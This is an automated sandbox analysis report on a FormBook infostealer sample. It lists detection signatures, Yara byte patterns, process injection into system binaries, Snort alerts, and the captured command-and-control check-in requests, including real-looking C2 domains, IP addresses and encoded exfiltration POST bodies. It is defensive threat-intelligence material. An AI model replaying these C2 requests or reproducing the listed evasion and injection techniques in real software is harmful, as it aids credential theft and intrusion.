Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe

Overview

General Information

Sample name:SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe
Analysis ID:1466067
MD5:a6d5020bf8bfe2dc1140a50936ef5ec9
SHA1:284d6d281a186da8c7bfa0ee5ce310be41be800b
SHA256:ac162f990dd540c5b295e5c8dfccc04374519feaa70ed0439292f70761a034cd
Tags:exeFormbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe (PID: 6952 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe" MD5: A6D5020BF8BFE2DC1140A50936EF5EC9)
    • svchost.exe (PID: 5612 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • DUipWAeQLm.exe (PID: 672 cmdline: "C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • RpcPing.exe (PID: 1524 cmdline: "C:\Windows\SysWOW64\RpcPing.exe" MD5: F7DD5764D96A988F0CF9DD4813751473)
          • DUipWAeQLm.exe (PID: 5700 cmdline: "C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6244 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.3339015758.0000000000FA0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000A.00000002.3339015758.0000000000FA0000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2e5c2:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x17031:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000002.00000002.2667649545.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000002.00000002.2667649545.0000000000400000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2ef33:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x179a2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000009.00000002.3339723767.0000000003150000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2e133:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16ba2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2ef33:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x179a2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe", CommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe, ParentProcessId: 6952, ParentProcessName: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe, ProcessCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe", ProcessId: 5612, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe", CommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe, ParentProcessId: 6952, ParentProcessName: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe, ProcessCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe", ProcessId: 5612, ProcessName: svchost.exe

            Snort Signatures

            Timestamp:07/02/24-13:54:01.230234
            SID:2855464
            Source Port:49735
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/02/24-13:53:46.839272
            SID:2855464
            Source Port:49730
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/02/24-13:53:54.891246
            SID:2855465
            Source Port:49733
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/02/24-13:53:25.871349
            SID:2855465
            Source Port:49727
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/02/24-13:53:49.739854
            SID:2855464
            Source Port:49731
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/02/24-13:54:03.924989
            SID:2855464
            Source Port:49736
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/02/24-13:53:46.839272
            SID:2856318
            Source Port:49730
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeReversingLabs: Detection: 47%
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000A.00000002.3339015758.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2667649545.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3339723767.0000000003150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3339772912.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2670025660.0000000006E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3337846059.0000000002C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3339477334.0000000002D90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2668432458.00000000049E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeJoe Sandbox ML: detected
            Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: DUipWAeQLm.exe, 00000008.00000002.3338157469.00000000001EE000.00000002.00000001.01000000.00000005.sdmp, DUipWAeQLm.exe, 0000000A.00000002.3337844651.00000000001EE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe, 00000000.00000003.2100307980.0000000003D30000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe, 00000000.00000003.2100194714.0000000003B90000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2463716754.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2668017220.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2668017220.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2454253649.0000000003800000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000009.00000002.3340029491.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000009.00000003.2668762022.0000000003153000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000009.00000002.3340029491.000000000364E000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000009.00000003.2678637133.0000000003309000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: RPCPing.pdbGCTL source: svchost.exe, 00000002.00000003.2635580745.000000000361A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635597112.000000000362B000.00000004.00000020.00020000.00000000.sdmp, DUipWAeQLm.exe, 00000008.00000002.3338848477.00000000007A8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe, 00000000.00000003.2100307980.0000000003D30000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe, 00000000.00000003.2100194714.0000000003B90000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2463716754.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2668017220.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2668017220.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2454253649.0000000003800000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, RpcPing.exe, 00000009.00000002.3340029491.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000009.00000003.2668762022.0000000003153000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000009.00000002.3340029491.000000000364E000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000009.00000003.2678637133.0000000003309000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: RPCPing.pdb source: svchost.exe, 00000002.00000003.2635580745.000000000361A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635597112.000000000362B000.00000004.00000020.00020000.00000000.sdmp, DUipWAeQLm.exe, 00000008.00000002.3338848477.00000000007A8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: RpcPing.exe, 00000009.00000002.3340567073.0000000003ADC000.00000004.10000000.00040000.00000000.sdmp, RpcPing.exe, 00000009.00000002.3338691097.0000000003062000.00000004.00000020.00020000.00000000.sdmp, DUipWAeQLm.exe, 0000000A.00000002.3339897724.0000000002DAC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.3124724882.0000000036F1C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: RpcPing.exe, 00000009.00000002.3340567073.0000000003ADC000.00000004.10000000.00040000.00000000.sdmp, RpcPing.exe, 00000009.00000002.3338691097.0000000003062000.00000004.00000020.00020000.00000000.sdmp, DUipWAeQLm.exe, 0000000A.00000002.3339897724.0000000002DAC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.3124724882.0000000036F1C000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007B4696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_007B4696
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007BC93C FindFirstFileW,FindClose,0_2_007BC93C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007BC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_007BC9C7
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007BF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_007BF200
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007BF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_007BF35D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007BF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_007BF65E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007B3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_007B3A2B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007B3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_007B3D4E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007BBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_007BBF27
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_02C9C400 FindFirstFileW,FindNextFileW,FindClose,9_2_02C9C400
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_02C9C536 FindFirstFileW,FindNextFileW,FindClose,9_2_02C9C536
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 4x nop then xor eax, eax9_2_02C89BA0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 4x nop then pop edi9_2_02C8E029
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 4x nop then mov ebx, 00000004h9_2_032904E8

            Networking

            barindex
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49727 -> 74.208.236.38:80
            Source: TrafficSnort IDS: 2856318 ETPRO TROJAN FormBook CnC Checkin (POST) M4 192.168.2.6:49730 -> 142.202.6.230:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49730 -> 142.202.6.230:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49731 -> 142.202.6.230:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49733 -> 142.202.6.230:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49735 -> 74.208.236.230:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49736 -> 74.208.236.230:80
            Source: Joe Sandbox ViewASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
            Source: Joe Sandbox ViewASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
            Source: Joe Sandbox ViewASN Name: REPRISE-HOSTINGUS REPRISE-HOSTINGUS
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007C25E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_007C25E2
            Source: global trafficHTTP traffic detected: GET /9m56/?Stux7=wSNNrhltoDErcnEw+GwIxBUk+E+vX1/TDY+0HSDY/xjQqFM+lgiwoO4LpiVzuA8Bz+prc1fM5Kq2+VzXMkRPNkNvcw4gdSknrLieRXJ4XwgsEWF+LJyDECQspbYqq9pNrRLiTEI=&YF9Df=_VBD7fO8YfupmT HTTP/1.1Host: www.costmoon.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
            Source: global trafficHTTP traffic detected: GET /hqcp/?Stux7=a7ZQHf8WLvhHVBver5nOwZih6r/S4XIGgVvybuFCKLHzqS2zk6yuhV2s1hLkbw5zmPfcdtbcw9raqNmLcm/5Ggyq9qBeDFk3p2MLA1pm9c8F5HyDpkyVADePZbSIOvXG2KyhUgY=&YF9Df=_VBD7fO8YfupmT HTTP/1.1Host: www.6171nvuhb.rentAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
            Source: global trafficDNS traffic detected: DNS query: www.costmoon.com
            Source: global trafficDNS traffic detected: DNS query: www.6171nvuhb.rent
            Source: global trafficDNS traffic detected: DNS query: www.motorsportgives.com
            Source: unknownHTTP traffic detected: POST /hqcp/ HTTP/1.1Host: www.6171nvuhb.rentAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brOrigin: http://www.6171nvuhb.rentReferer: http://www.6171nvuhb.rent/hqcp/Content-Length: 210Connection: closeContent-Type: application/x-www-form-urlencodedCache-Control: max-age=0User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10Data Raw: 53 74 75 78 37 3d 58 35 78 77 45 6f 74 53 56 2f 52 53 53 33 4c 58 75 4e 6a 30 32 38 72 30 69 38 76 63 2f 42 30 2f 79 43 66 34 47 66 46 73 45 4b 75 31 79 79 61 67 34 34 53 56 67 46 2b 62 32 41 2f 70 59 79 6b 4f 77 66 4c 77 61 70 4b 4c 36 37 76 6c 72 62 44 72 58 6b 62 6b 45 78 37 41 32 61 56 41 66 6d 4e 62 6d 45 6b 37 52 78 31 38 34 74 68 6e 2b 79 2b 5a 6b 42 50 6d 4d 6d 57 6b 4b 6f 72 6b 45 73 66 42 2b 49 76 74 51 6b 74 6c 79 50 4f 4c 32 7a 55 39 52 74 44 30 38 56 42 6f 68 5a 69 41 70 62 4c 76 45 52 31 36 58 70 4b 66 54 70 31 49 57 36 50 54 6c 33 71 69 65 4c 6f 55 34 31 55 4e 49 37 69 6b 50 77 49 42 4e 77 62 64 57 41 69 4d Data Ascii: Stux7=X5xwEotSV/RSS3LXuNj028r0i8vc/B0/yCf4GfFsEKu1yyag44SVgF+b2A/pYykOwfLwapKL67vlrbDrXkbkEx7A2aVAfmNbmEk7Rx184thn+y+ZkBPmMmWkKorkEsfB+IvtQktlyPOL2zU9RtD08VBohZiApbLvER16XpKfTp1IW6PTl3qieLoU41UNI7ikPwIBNwbdWAiM
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 626Connection: closeDate: Tue, 02 Jul 2024 11:53:26 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 74 6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 02 Jul 2024 11:54:01 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 